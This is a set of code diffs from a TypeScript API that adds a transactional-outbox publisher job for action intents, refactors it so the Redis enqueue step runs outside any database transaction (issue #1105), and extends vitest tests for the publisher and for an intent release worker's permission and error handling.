+    runOutsideDbContext,
   };
 });
 
@@ -45,6 +66,7 @@ vi.mock('../services/sentry', () => ({
 
 import { publishOutboxRows } from './intentOutboxPublisher';
 import { captureException } from '../services/sentry';
+import * as dbModule from '../db';
 
 function makeUpdateChain(returningValue: unknown = undefined) {
   const where = vi.fn(() => Promise.resolve(returningValue));
@@ -171,5 +193,50 @@ describe('intentOutboxPublisher.publishOutboxRows', () => {
     expect(result).toEqual({ published: 0, skipped: 0 });
     expect(updateMock).not.toHaveBeenCalled();
     expect(captureException).toHaveBeenCalledTimes(1);
+  });
+
+  // #1105 regression: publishOutboxRows must release its DB access context
+  // before calling queue.add(). Previously the whole function (claim +
+  // enqueue + mark-published) ran inside a single caller-provided
+  // withSystemDbAccessContext, so this Redis round-trip pinned a pooled
+  // Postgres connection idle-in-transaction on every claimed row, every 5s.
+  // The `../db` mock above is a REAL AsyncLocalStorage-backed context
+  // tracker (not an identity pass-through), so `hasDbAccessContext()` here
+  // reflects the actual context boundary `publishOutboxRows` establishes —
+  // a mock that stubbed `withSystemDbAccessContext` as `fn => fn()` could
+  // never have caught this, because `hasDbAccessContext()` would report
+  // false unconditionally regardless of where the enqueue actually ran.
+  it('releases the DB access context before enqueueing — #1105', async () => {
+    executeMock.mockResolvedValueOnce({ rows: [] });
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 5,
+          intent_id: 'intent-5',
+          event_type: 'intent_created',
+          publish_attempts: 1,
+        },
+      ],
+    });
+    const chain = makeUpdateChain();
+    updateMock.mockReturnValue({ set: chain.set });
+
+    let sawContextDuringEnqueue: boolean | undefined;
+    addMock.mockImplementation(async () => {
+      sawContextDuringEnqueue = dbModule.hasDbAccessContext();
+      return { id: 'bullmq-job-5' };
+    });
+
+    const result = await publishOutboxRows();
+
+    expect(result).toEqual({ published: 1, skipped: 0 });
+    expect(addMock).toHaveBeenCalledTimes(1);
+    // The load-bearing assertion: queue.add() ran with NO DB access context
+    // held. `false` here (not `undefined`) also proves the callback actually
+    // ran and made the check, not just that it was skipped.
+    expect(sawContextDuringEnqueue).toBe(false);
+    // Sanity: the DB context helper itself is not held after the full pass
+    // either — the claim and mark-published contexts both closed cleanly.
+    expect(dbModule.hasDbAccessContext()).toBe(false);
   });
 });

--- a/apps/api/src/jobs/intentOutboxPublisher.test.ts
+++ b/apps/api/src/jobs/intentOutboxPublisher.test.ts
@@ -1,0 +1,175 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+const { executeMock, updateMock, addMock, closeMock } = vi.hoisted(() => ({
+  executeMock: vi.fn(),
+  updateMock: vi.fn(),
+  addMock: vi.fn(),
+  closeMock: vi.fn(),
+}));
+
+vi.mock('bullmq', () => ({
+  Queue: class {},
+  Worker: class {},
+  Job: class {},
+}));
+
+vi.mock('../db', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('../db')>();
+  return {
+    ...actual,
+    db: {
+      ...actual.db,
+      execute: (...args: unknown[]) => executeMock(...(args as [])),
+      update: (...args: unknown[]) => updateMock(...(args as [])),
+    },
+    withSystemDbAccessContext: async <T>(fn: () => Promise<T>) => fn(),
+  };
+});
+
+vi.mock('../services/redis', () => ({
+  getRedisConnection: vi.fn(() => ({})),
+  getBullMQConnection: vi.fn(() => ({ host: 'localhost', port: 6379 })),
+  isBullMQAvailable: vi.fn(() => true),
+}));
+
+vi.mock('../services/bullmqQueue', () => ({
+  createInstrumentedQueue: vi.fn(() => ({
+    add: addMock,
+    close: closeMock,
+  })),
+}));
+
+vi.mock('../services/sentry', () => ({
+  captureException: vi.fn(),
+}));
+
+import { publishOutboxRows } from './intentOutboxPublisher';
+import { captureException } from '../services/sentry';
+
+function makeUpdateChain(returningValue: unknown = undefined) {
+  const where = vi.fn(() => Promise.resolve(returningValue));
+  const set = vi.fn(() => ({ where }));
+  return { set, where };
+}
+
+describe('intentOutboxPublisher.publishOutboxRows', () => {
+  beforeEach(() => {
+    vi.resetAllMocks();
+    addMock.mockResolvedValue({ id: 'bullmq-job-1' });
+  });
+
+  it('enqueues claimed rows with hyphenated jobId, marks published, and increments attempts', async () => {
+    // Call 1: stuck-row alarm scan — nothing stuck.
+    executeMock.mockResolvedValueOnce({ rows: [] });
+    // Call 2: claim query — one live row, attempts already bumped to 1 by the SQL.
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 1,
+          intent_id: 'intent-1',
+          event_type: 'intent_created',
+          publish_attempts: 1,
+        },
+      ],
+    });
+
+    const chain = makeUpdateChain();
+    updateMock.mockReturnValue({ set: chain.set });
+
+    const result = await publishOutboxRows();
+
+    expect(result).toEqual({ published: 1, skipped: 0 });
+    expect(addMock).toHaveBeenCalledTimes(1);
+    expect(addMock).toHaveBeenCalledWith(
+      'intent_created',
+      { intentId: 'intent-1', eventType: 'intent_created' },
+      expect.objectContaining({ jobId: 'intent-intent_created-intent-1' }),
+    );
+    // jobId has no colons — BullMQ jobId rule.
+    const jobId = (addMock.mock.calls[0] as unknown[])[2] as { jobId: string };
+    expect(jobId.jobId).not.toContain(':');
+
+    // published_at marked for the enqueued row.
+    expect(updateMock).toHaveBeenCalledTimes(1);
+    expect(chain.set).toHaveBeenCalledTimes(1);
+    expect(chain.where).toHaveBeenCalledTimes(1);
+  });
+
+  it('skips rows with publish_attempts > 5: logs, captures, does not enqueue', async () => {
+    // Call 1: stuck-row alarm scan finds one poisoned row.
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 2,
+          intent_id: 'intent-2',
+          event_type: 'intent_approved',
+          publish_attempts: 6,
+        },
+      ],
+    });
+    // Call 2: claim query — nothing else live.
+    executeMock.mockResolvedValueOnce({ rows: [] });
+
+    const result = await publishOutboxRows();
+
+    expect(result).toEqual({ published: 0, skipped: 1 });
+    expect(addMock).not.toHaveBeenCalled();
+    expect(updateMock).not.toHaveBeenCalled();
+    expect(captureException).toHaveBeenCalledTimes(1);
+    const captured = (captureException as ReturnType<typeof vi.fn>).mock.calls[0]?.[0] as Error;
+    expect(captured.message).toContain('intent-2');
+    expect(captured.message).toContain('6 publish attempts');
+  });
+
+  it('re-run does not double-enqueue already-published rows', async () => {
+    // First run: one row claimed and published.
+    executeMock.mockResolvedValueOnce({ rows: [] });
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 3,
+          intent_id: 'intent-3',
+          event_type: 'intent_created',
+          publish_attempts: 1,
+        },
+      ],
+    });
+    const chain = makeUpdateChain();
+    updateMock.mockReturnValue({ set: chain.set });
+
+    const first = await publishOutboxRows();
+    expect(first.published).toBe(1);
+    expect(addMock).toHaveBeenCalledTimes(1);
+
+    // Second run: the DB-level `published_at IS NULL` filter now excludes the
+    // row, so both queries come back empty.
+    executeMock.mockResolvedValueOnce({ rows: [] });
+    executeMock.mockResolvedValueOnce({ rows: [] });
+
+    const second = await publishOutboxRows();
+    expect(second).toEqual({ published: 0, skipped: 0 });
+    // Still only the one call from the first run.
+    expect(addMock).toHaveBeenCalledTimes(1);
+  });
+
+  it('leaves published_at unset and does not crash when enqueue fails', async () => {
+    executeMock.mockResolvedValueOnce({ rows: [] });
+    executeMock.mockResolvedValueOnce({
+      rows: [
+        {
+          id: 4,
+          intent_id: 'intent-4',
+          event_type: 'intent_created',
+          publish_attempts: 2,
+        },
+      ],
+    });
+    addMock.mockRejectedValueOnce(new Error('redis unavailable'));
+
+    const result = await publishOutboxRows();
+
+    expect(result).toEqual({ published: 0, skipped: 0 });
+    expect(updateMock).not.toHaveBeenCalled();
+    expect(captureException).toHaveBeenCalledTimes(1);
+  });
+});

--- a/apps/api/src/jobs/intentOutboxPublisher.ts
+++ b/apps/api/src/jobs/intentOutboxPublisher.ts
@@ -1,0 +1,297 @@
+import { Job, Queue, Worker } from 'bullmq';
+import { inArray, sql } from 'drizzle-orm';
+import * as dbModule from '../db';
+import { db } from '../db';
+import { intentOutbox } from '../db/schema/actionIntents';
+import { getBullMQConnection } from '../services/redis';
+import { createInstrumentedQueue } from '../services/bullmqQueue';
+import { captureException } from '../services/sentry';
+
+/**
+ * Drains the `intent_outbox` transactional outbox (spec
+ * docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+ * §5) into the `action-intents` BullMQ queue that `jobs/intentReleaseWorker.ts`
+ * (Task 7 — not built here) consumes. This module only creates the queue and
+ * publishes to it; it never processes `action-intents` jobs itself.
+ *
+ * Each pass:
+ *  1. Read-only alarm scan for rows already stuck past MAX_PUBLISH_ATTEMPTS —
+ *     logged + Sentry-captured, left untouched (no lock, no enqueue, no further
+ *     attempts increment) so they stay visible for manual inspection.
+ *  2. Atomically claim up to MAX_PUBLISH_PER_RUN live rows (`published_at IS
+ *     NULL`, `publish_attempts <= MAX_PUBLISH_ATTEMPTS`, `FOR UPDATE SKIP
+ *     LOCKED`) and bump `publish_attempts` in the same statement — so a crash
+ *     between claim and enqueue still counts as a used attempt.
+ *  3. For each claimed row, enqueue an `action-intents` job with a
+ *     hyphen-only, dedupe-stable jobId (`intent-<eventType>-<intentId>` — see
+ *     BullMQ jobId rule: colons collide with BullMQ's own key delimiter).
+ *     This step runs AFTER the claiming transaction has committed (not
+ *     inside it) so a Redis round-trip per row never pins a pooled DB
+ *     connection idle-in-transaction (#1105).
+ *  4. Mark `published_at = now()` for whichever rows actually enqueued
+ *     successfully. Rows that failed to enqueue keep `published_at IS NULL`
+ *     and are naturally retried next pass (their attempt was already
+ *     counted in step 2). Re-publishing is harmless: `intentReleaseWorker`
+ *     consumers are CAS-idempotent and BullMQ's jobId dedupe collapses
+ *     duplicate enqueues of the same event for the same intent.
+ *
+ * Runs every 5 seconds inside `withSystemDbAccessContext` — `intent_outbox`
+ * has RLS disabled entirely (system-scoped, workers only; same precedent as
+ * `device_commands`), but the DB-context helper is used uniformly across
+ * background jobs regardless of RLS status.
+ */
+
+const REAPER_QUEUE_NAME = 'intent-outbox-publisher';
+const ACTION_INTENTS_QUEUE_NAME = 'action-intents';
+const PUBLISH_INTERVAL_MS = 5 * 1000; // every 5s
+const MAX_PUBLISH_PER_RUN = 200;
+// Rows with publish_attempts > this are considered stuck: logged as an alarm
+// and left alone rather than retried forever.
+const MAX_PUBLISH_ATTEMPTS = 5;
+
+type PublisherJobData = { type: 'publish-intent-outbox'; queuedAt: string };
+
+const runWithSystemDbAccess = async <T>(fn: () => Promise<T>): Promise<T> => {
+  const withSystem = dbModule.withSystemDbAccessContext;
+  if (typeof withSystem !== 'function') {
+    throw new Error(
+      '[IntentOutboxPublisher] withSystemDbAccessContext not available — publisher cannot run without system DB access',
+    );
+  }
+  return withSystem(fn);
+};
+
+let reaperQueue: Queue<PublisherJobData> | null = null;
+let reaperWorker: Worker<PublisherJobData> | null = null;
+let actionIntentsQueue: Queue | null = null;
+
+function getQueue(): Queue<PublisherJobData> {
+  if (!reaperQueue) {
+    reaperQueue = new Queue<PublisherJobData>(REAPER_QUEUE_NAME, {
+      connection: getBullMQConnection(),
+    });
+  }
+  return reaperQueue;
+}
+
+function getActionIntentsQueue(): Queue {
+  if (!actionIntentsQueue) {
+    actionIntentsQueue = createInstrumentedQueue(ACTION_INTENTS_QUEUE_NAME);
+  }
+  return actionIntentsQueue;
+}
+
+// `type` (not `interface`) so TS's implicit index signature for object type
+// literals applies — `db.execute<T>`'s constraint is `Record<string,
+// unknown>`, which a plain `interface` declaration does not structurally
+// satisfy without an explicit `[key: string]: unknown` member (TS2344).
+type StuckOutboxRow = {
+  id: number;
+  intent_id: string;
+  event_type: string;
+  publish_attempts: number;
+};
+
+type ClaimedOutboxRow = {
+  id: number;
+  intent_id: string;
+  event_type: string;
+  publish_attempts: number;
+};
+
+function extractRows<T>(result: unknown): T[] {
+  const rows = (result as { rows?: T[] }).rows ?? (result as T[]);
+  return Array.isArray(rows) ? rows : [];
+}
+
+export interface PublishOutboxResult {
+  published: number;
+  skipped: number;
+}
+
+/**
+ * Single pass over `intent_outbox`. Returns the number of rows successfully
+ * published and the number of rows skipped as permanently stuck.
+ */
+export async function publishOutboxRows(): Promise<PublishOutboxResult> {
+  // Step 1: read-only alarm scan — never locked, never mutated.
+  const stuck = await db.execute<StuckOutboxRow>(sql`
+    SELECT id, intent_id, event_type, publish_attempts
+    FROM ${intentOutbox}
+    WHERE ${intentOutbox.publishedAt} IS NULL
+      AND ${intentOutbox.publishAttempts} > ${MAX_PUBLISH_ATTEMPTS}
+    ORDER BY ${intentOutbox.createdAt} ASC
+    LIMIT ${MAX_PUBLISH_PER_RUN}
+  `);
+  const stuckRows = extractRows<StuckOutboxRow>(stuck);
+  for (const row of stuckRows) {
+    const message =
+      `[IntentOutboxPublisher] intent_outbox row ${row.id} (intent ${row.intent_id}, `
+      + `event ${row.event_type}) stuck at ${row.publish_attempts} publish attempts — skipping`;
+    console.error(message);
+    captureException(new Error(message));
+  }
+
+  // Step 2: atomically claim live rows and bump publish_attempts.
+  const claimed = await db.execute<ClaimedOutboxRow>(sql`
+    WITH due AS (
+      SELECT id
+      FROM ${intentOutbox}
+      WHERE ${intentOutbox.publishedAt} IS NULL
+        AND ${intentOutbox.publishAttempts} <= ${MAX_PUBLISH_ATTEMPTS}
+      ORDER BY ${intentOutbox.createdAt} ASC
+      LIMIT ${MAX_PUBLISH_PER_RUN}
+      FOR UPDATE SKIP LOCKED
+    )
+    UPDATE ${intentOutbox} AS o
+    SET publish_attempts = o.publish_attempts + 1
+    FROM due
+    WHERE o.id = due.id
+    RETURNING o.id, o.intent_id, o.event_type, o.publish_attempts;
+  `);
+  const claimedRows = extractRows<ClaimedOutboxRow>(claimed);
+
+  if (claimedRows.length === 0) {
+    return { published: 0, skipped: stuckRows.length };
+  }
+
+  // Step 3: enqueue outside the claiming transaction (already committed by now).
+  const queue = getActionIntentsQueue();
+  const publishedIds: number[] = [];
+  for (const row of claimedRows) {
+    try {
+      await queue.add(
+        row.event_type,
+        { intentId: row.intent_id, eventType: row.event_type },
+        {
+          jobId: `intent-${row.event_type}-${row.intent_id}`,
+          removeOnComplete: { count: 500 },
+          removeOnFail: { count: 500 },
+        },
+      );
+      publishedIds.push(row.id);
+    } catch (err) {
+      console.error(`[IntentOutboxPublisher] Failed to enqueue outbox row ${row.id}:`, err);
+      captureException(err instanceof Error ? err : new Error(String(err)));
+      // Leave published_at NULL — next pass retries; attempt already counted above.
+    }
+  }
+
+  // Step 4: mark successfully-enqueued rows published.
+  if (publishedIds.length > 0) {
+    await db
+      .update(intentOutbox)
+      .set({ publishedAt: sql`now()` })
+      .where(inArray(intentOutbox.id, publishedIds));
+  }
+
+  if (claimedRows.length === MAX_PUBLISH_PER_RUN) {
+    console.warn(
+      `[IntentOutboxPublisher] Hit ${MAX_PUBLISH_PER_RUN}-item cap — backlog may be growing`,
+    );
+  }
+
+  return { published: publishedIds.length, skipped: stuckRows.length };
+}
+
+function createWorker(): Worker<PublisherJobData> {
+  return new Worker<PublisherJobData>(
+    REAPER_QUEUE_NAME,
+    async (_job: Job<PublisherJobData>) => {
+      try {
+        const { published, skipped } = await runWithSystemDbAccess(publishOutboxRows);
+        if (published > 0 || skipped > 0) {
+          console.log(
+            `[IntentOutboxPublisher] Published ${published} outbox row(s), ${skipped} stuck`,
+          );
+        }
+        return { published, skipped };
+      } catch (err) {
+        console.error('[IntentOutboxPublisher] Run failed:', err);
+        captureException(err instanceof Error ? err : new Error(String(err)));
+        throw err;
+      }
+    },
+    {
+      connection: getBullMQConnection(),
+      concurrency: 1,
+    },
+  );
+}
+
+async function scheduleRepeatableJob(): Promise<void> {
+  const queue = getQueue();
+
+  const repeatables = await queue.getRepeatableJobs();
+  for (const job of repeatables) {
+    if (job.name === 'publish-intent-outbox') {
+      await queue.removeRepeatableByKey(job.key);
+    }
+  }
+
+  await queue.add(
+    'publish-intent-outbox',
+    { type: 'publish-intent-outbox', queuedAt: new Date().toISOString() },
+    {
+      jobId: 'intent-outbox-publisher',
+      repeat: { every: PUBLISH_INTERVAL_MS },
+      removeOnComplete: { count: 20 },
+      removeOnFail: { count: 200 },
+    },
+  );
+}
+
+export async function initializeIntentOutboxPublisher(): Promise<void> {
+  if (reaperWorker) return;
+
+  reaperWorker = createWorker();
+  reaperWorker.on('error', (error) => {
+    console.error('[IntentOutboxPublisher] Worker error:', error);
+    captureException(error);
+  });
+  reaperWorker.on('failed', (job, error) => {
+    console.error(`[IntentOutboxPublisher] Job ${job?.id} failed:`, error);
+    captureException(error);
+  });
+
+  try {
+    await scheduleRepeatableJob();
+  } catch (err) {
+    await reaperWorker.close();
+    reaperWorker = null;
+    throw err;
+  }
+
+  console.log('[IntentOutboxPublisher] Initialized');
+}
+
+export async function shutdownIntentOutboxPublisher(): Promise<void> {
+  const worker = reaperWorker;
+  const queue = reaperQueue;
+  const targetQueue = actionIntentsQueue;
+  reaperWorker = null;
+  reaperQueue = null;
+  actionIntentsQueue = null;
+
+  if (worker) {
+    try {
+      await worker.close();
+    } catch (err) {
+      console.error('[IntentOutboxPublisher] Error closing worker:', err);
+    }
+  }
+  if (queue) {
+    try {
+      await queue.close();
+    } catch (err) {
+      console.error('[IntentOutboxPublisher] Error closing queue:', err);
+    }
+  }
+  if (targetQueue) {
+    try {
+      await targetQueue.close();
+    } catch (err) {
+      console.error('[IntentOutboxPublisher] Error closing action-intents queue:', err);
+    }
+  }
+}

--- a/apps/api/src/jobs/intentOutboxPublisher.ts
+++ b/apps/api/src/jobs/intentOutboxPublisher.ts
@@ -21,24 +21,33 @@ import { captureException } from '../services/sentry';
  *  2. Atomically claim up to MAX_PUBLISH_PER_RUN live rows (`published_at IS
  *     NULL`, `publish_attempts <= MAX_PUBLISH_ATTEMPTS`, `FOR UPDATE SKIP
  *     LOCKED`) and bump `publish_attempts` in the same statement — so a crash
- *     between claim and enqueue still counts as a used attempt.
+ *     between claim and enqueue still counts as a used attempt. Steps 1-2 run
+ *     inside a short `withSystemDbAccessContext` call that closes (commits)
+ *     before step 3 starts.
  *  3. For each claimed row, enqueue an `action-intents` job with a
  *     hyphen-only, dedupe-stable jobId (`intent-<eventType>-<intentId>` — see
  *     BullMQ jobId rule: colons collide with BullMQ's own key delimiter).
- *     This step runs AFTER the claiming transaction has committed (not
- *     inside it) so a Redis round-trip per row never pins a pooled DB
- *     connection idle-in-transaction (#1105).
+ *     This step runs explicitly OUTSIDE any DB access context
+ *     (`runOutsideDbContext`) so a Redis round-trip per row never pins a
+ *     pooled DB connection idle-in-transaction (#1105) — `queue.add()` is
+ *     instrumented (`createInstrumentedQueue`) to warn/throw if it ever runs
+ *     while a context is still held.
  *  4. Mark `published_at = now()` for whichever rows actually enqueued
- *     successfully. Rows that failed to enqueue keep `published_at IS NULL`
- *     and are naturally retried next pass (their attempt was already
- *     counted in step 2). Re-publishing is harmless: `intentReleaseWorker`
- *     consumers are CAS-idempotent and BullMQ's jobId dedupe collapses
- *     duplicate enqueues of the same event for the same intent.
+ *     successfully, in a SECOND short `withSystemDbAccessContext` call. Rows
+ *     that failed to enqueue keep `published_at IS NULL` and are naturally
+ *     retried next pass (their attempt was already counted in step 2).
+ *     Re-publishing is harmless: `intentReleaseWorker` consumers are
+ *     CAS-idempotent and BullMQ's jobId dedupe collapses duplicate enqueues
+ *     of the same event for the same intent.
  *
- * Runs every 5 seconds inside `withSystemDbAccessContext` — `intent_outbox`
- * has RLS disabled entirely (system-scoped, workers only; same precedent as
- * `device_commands`), but the DB-context helper is used uniformly across
- * background jobs regardless of RLS status.
+ * Runs every 5 seconds. `publishOutboxRows` itself opens and closes the two
+ * short `withSystemDbAccessContext` transactions (claim, then mark-published)
+ * around the enqueue step — the worker processor must NOT wrap the whole
+ * function in a single outer context, or the enqueue loop would run inside a
+ * held transaction (the exact #1105 anti-pattern this module exists to
+ * avoid). `intent_outbox` has RLS disabled entirely (system-scoped, workers
+ * only; same precedent as `device_commands`), but the DB-context helper is
+ * used uniformly across background jobs regardless of RLS status.
  */
 
 const REAPER_QUEUE_NAME = 'intent-outbox-publisher';
@@ -59,6 +68,18 @@ const runWithSystemDbAccess = async <T>(fn: () => Promise<T>): Promise<T> => {
     );
   }
   return withSystem(fn);
+};
+
+// #1105 — explicitly exits any DB access context before running `fn`. Used to
+// wrap the enqueue loop so a Redis round-trip per row can never run while a
+// pooled connection is pinned idle-in-transaction, even if a future caller
+// mistakenly invokes `publishOutboxRows` from inside an existing context.
+const runOutsideDbContext = <T>(fn: () => Promise<T>): Promise<T> => {
+  const runOutside = dbModule.runOutsideDbContext;
+  if (typeof runOutside !== 'function') {
+    return fn();
+  }
+  return runOutside(fn);
 };
 
 let reaperQueue: Queue<PublisherJobData> | null = null;
@@ -109,12 +130,18 @@ export interface PublishOutboxResult {
   skipped: number;
 }
 
+interface ClaimResult {
+  stuckRows: StuckOutboxRow[];
+  claimedRows: ClaimedOutboxRow[];
+}
+
 /**
- * Single pass over `intent_outbox`. Returns the number of rows successfully
- * published and the number of rows skipped as permanently stuck.
+ * Phase 1 (CLAIM) — DB-only work. Runs inside its own short
+ * `withSystemDbAccessContext` transaction (opened by the caller) so the held
+ * connection covers only these two statements, never the enqueue loop.
  */
-export async function publishOutboxRows(): Promise<PublishOutboxResult> {
-  // Step 1: read-only alarm scan — never locked, never mutated.
+async function scanAndClaimOutboxRows(): Promise<ClaimResult> {
+  // Read-only alarm scan — never locked, never mutated.
   const stuck = await db.execute<StuckOutboxRow>(sql`
     SELECT id, intent_id, event_type, publish_attempts
     FROM ${intentOutbox}
@@ -132,7 +159,7 @@ export async function publishOutboxRows(): Promise<PublishOutboxResult> {
     captureException(new Error(message));
   }
 
-  // Step 2: atomically claim live rows and bump publish_attempts.
+  // Atomically claim live rows and bump publish_attempts.
   const claimed = await db.execute<ClaimedOutboxRow>(sql`
     WITH due AS (
       SELECT id
@@ -151,14 +178,19 @@ export async function publishOutboxRows(): Promise<PublishOutboxResult> {
   `);
   const claimedRows = extractRows<ClaimedOutboxRow>(claimed);
 
-  if (claimedRows.length === 0) {
-    return { published: 0, skipped: stuckRows.length };
-  }
+  return { stuckRows, claimedRows };
+}
 
-  // Step 3: enqueue outside the claiming transaction (already committed by now).
+/**
+ * Phase 2 (ENQUEUE) — no DB context. Caller must invoke this via
+ * `runOutsideDbContext` so `queue.add()` (instrumented by
+ * `createInstrumentedQueue`) never runs while a pooled connection is pinned
+ * idle-in-transaction (#1105).
+ */
+async function enqueueClaimedRows(rows: ClaimedOutboxRow[]): Promise<number[]> {
   const queue = getActionIntentsQueue();
   const publishedIds: number[] = [];
-  for (const row of claimedRows) {
+  for (const row of rows) {
     try {
       await queue.add(
         row.event_type,
@@ -176,13 +208,48 @@ export async function publishOutboxRows(): Promise<PublishOutboxResult> {
       // Leave published_at NULL — next pass retries; attempt already counted above.
     }
   }
+  return publishedIds;
+}
 
-  // Step 4: mark successfully-enqueued rows published.
+/**
+ * Phase 3 (MARK PUBLISHED) — DB-only work, its own short
+ * `withSystemDbAccessContext` transaction opened by the caller, entirely
+ * separate from the claim transaction so it never overlaps the enqueue loop.
+ */
+async function markOutboxRowsPublished(ids: number[]): Promise<void> {
+  if (ids.length === 0) return;
+  await db
+    .update(intentOutbox)
+    .set({ publishedAt: sql`now()` })
+    .where(inArray(intentOutbox.id, ids));
+}
+
+/**
+ * Single pass over `intent_outbox`. Returns the number of rows successfully
+ * published and the number of rows skipped as permanently stuck.
+ *
+ * Orchestrates its own DB-context boundaries (claim → enqueue → mark
+ * published) so no caller may accidentally hold a DB transaction open across
+ * the enqueue loop (#1105). Callers must invoke this directly, never wrapped
+ * in an outer `withSystemDbAccessContext`.
+ */
+export async function publishOutboxRows(): Promise<PublishOutboxResult> {
+  // Phase 1: claim, inside a short DB context that closes before we return.
+  const { stuckRows, claimedRows } = await runWithSystemDbAccess(scanAndClaimOutboxRows);
+
+  if (claimedRows.length === 0) {
+    return { published: 0, skipped: stuckRows.length };
+  }
+
+  // Phase 2: enqueue, explicitly outside any DB context — the claiming
+  // transaction from phase 1 has already committed, but we exit defensively
+  // in case a future caller nests `publishOutboxRows` inside its own context.
+  const publishedIds = await runOutsideDbContext(() => enqueueClaimedRows(claimedRows));
+
+  // Phase 3: mark successfully-enqueued rows published, in a second short
+  // DB context that never overlaps the enqueue loop above.
   if (publishedIds.length > 0) {
-    await db
-      .update(intentOutbox)
-      .set({ publishedAt: sql`now()` })
-      .where(inArray(intentOutbox.id, publishedIds));
+    await runWithSystemDbAccess(() => markOutboxRowsPublished(publishedIds));
   }
 
   if (claimedRows.length === MAX_PUBLISH_PER_RUN) {
@@ -199,7 +266,11 @@ function createWorker(): Worker<PublisherJobData> {
     REAPER_QUEUE_NAME,
     async (_job: Job<PublisherJobData>) => {
       try {
-        const { published, skipped } = await runWithSystemDbAccess(publishOutboxRows);
+        // publishOutboxRows manages its own DB-context boundaries internally
+        // (claim → enqueue → mark-published) — it must NOT be wrapped in an
+        // outer withSystemDbAccessContext here, or the enqueue loop would run
+        // inside a held transaction (#1105).
+        const { published, skipped } = await publishOutboxRows();
         if (published > 0 || skipped > 0) {
           console.log(
             `[IntentOutboxPublisher] Published ${published} outbox row(s), ${skipped} stuck`,

--- a/apps/api/src/jobs/intentReleaseWorker.test.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.test.ts
@@ -219,6 +219,51 @@ describe('releaseApprovedIntent', () => {
     expect(auditMock.writeAuditEvent).not.toHaveBeenCalled();
   });
 
+  it('returned tool error (JSON {error}) -> failed:tool_returned_error, not completed', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    // executeTool did not throw, but handed back an error body (e.g. device
+    // access revoked after approval). Must be recorded as a FAILED release.
+    aiToolsMock.executeTool.mockResolvedValueOnce(
+      JSON.stringify({ error: 'Device not found or access denied' }),
+    );
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> failed
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'failed',
+      expect.objectContaining({
+        errorCode: 'tool_returned_error',
+        result: { error: 'Device not found or access denied' },
+        executedAt: expect.any(Date),
+      }),
+    );
+    // Failure audit written, and NOT recorded as an executed success.
+    expect(auditMock.writeAuditEvent).toHaveBeenCalled();
+    expect(metricsMock.recordActionIntentEvent).not.toHaveBeenCalledWith(
+      expect.objectContaining({ outcome: 'executed' }),
+    );
+  });
+
+  it('a JSON body with both {error} and {success} is treated as success (not a returned error)', async () => {
+    const intent = baseIntent();
+    primeThroughRevalidation(intent);
+    aiToolsMock.executeTool.mockResolvedValueOnce(JSON.stringify({ success: true, error: null }));
+    intentServiceMock.transitionIntent.mockResolvedValueOnce(true); // executing -> completed
+
+    await releaseApprovedIntent(intent.id);
+
+    expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
+      intent.id,
+      'executing',
+      'completed',
+      expect.anything(),
+    );
+  });
+
   it('digest_mismatch: no winning approval row found -> failed, executeTool never called', async () => {
     const intent = baseIntent();
     intentServiceMock.transitionIntent.mockResolvedValueOnce(true);

--- a/apps/api/src/jobs/intentReleaseWorker.test.ts
+++ b/apps/api/src/jobs/intentReleaseWorker.test.ts
@@ -4,7 +4,7 @@ import { describe, it, expect, vi, beforeEach } from 'vitest';
 // Hoisted shared mock state
 // ---------------------------------------------------------------------------
 
-const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, aiToolsMock, authMock, auditMock, metricsMock, sentryMock } = vi.hoisted(() => {
+const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, aiToolsMock, aiGuardrailsMock, authMock, auditMock, metricsMock, sentryMock } = vi.hoisted(() => {
   const col = (name: string) => ({ name });
   const actionIntentsTbl = { id: col('id') };
   const approvalRequestsTbl = { id: col('id'), intentId: col('intent_id'), status: col('status') };
@@ -19,6 +19,7 @@ const { schema, dbState, intentServiceMock, actorContextMock, tenantStatusMock, 
     actorContextMock: { buildAuthContextForIntent: vi.fn() },
     tenantStatusMock: { getActiveOrgTenant: vi.fn() },
     aiToolsMock: { getToolTier: vi.fn(), executeTool: vi.fn() },
+    aiGuardrailsMock: { checkToolPermission: vi.fn() },
     authMock: { dbAccessContextFromAuth: vi.fn((auth: unknown) => ({ mock: 'dbContext', auth })) },
     auditMock: {
       writeAuditEvent: vi.fn(),
@@ -80,6 +81,9 @@ vi.mock('../services/tenantStatus', () => ({
 vi.mock('../services/aiTools', () => ({
   getToolTier: aiToolsMock.getToolTier,
   executeTool: aiToolsMock.executeTool,
+}));
+vi.mock('../services/aiGuardrails', () => ({
+  checkToolPermission: aiGuardrailsMock.checkToolPermission,
 }));
 vi.mock('../middleware/auth', () => ({
   dbAccessContextFromAuth: authMock.dbAccessContextFromAuth,
@@ -166,6 +170,7 @@ function primeThroughRevalidation(intent: ActionIntent) {
   aiToolsMock.getToolTier.mockReturnValue(intent.riskTier);
   actorContextMock.buildAuthContextForIntent.mockResolvedValueOnce(fakeAuth);
   tenantStatusMock.getActiveOrgTenant.mockResolvedValueOnce({ orgId: intent.orgId, partnerId: 'partner-1' });
+  aiGuardrailsMock.checkToolPermission.mockResolvedValueOnce(null);
 }
 
 describe('releaseApprovedIntent', () => {
@@ -193,6 +198,11 @@ describe('releaseApprovedIntent', () => {
 
     await releaseApprovedIntent(intent.id);
 
+    expect(aiGuardrailsMock.checkToolPermission).toHaveBeenCalledWith(
+      intent.actionName,
+      intent.arguments,
+      fakeAuth,
+    );
     expect(aiToolsMock.executeTool).toHaveBeenCalledWith(intent.actionName, intent.arguments, fakeAuth);
     expect(intentServiceMock.transitionIntent).toHaveBeenLastCalledWith(
       intent.id,
@@ -338,6 +348,48 @@ describe('releaseApprovedIntent', () => {
       'failed',
       expect.objectContaining({ errorCode: 'org_inactive' }),
     );
+  });
+
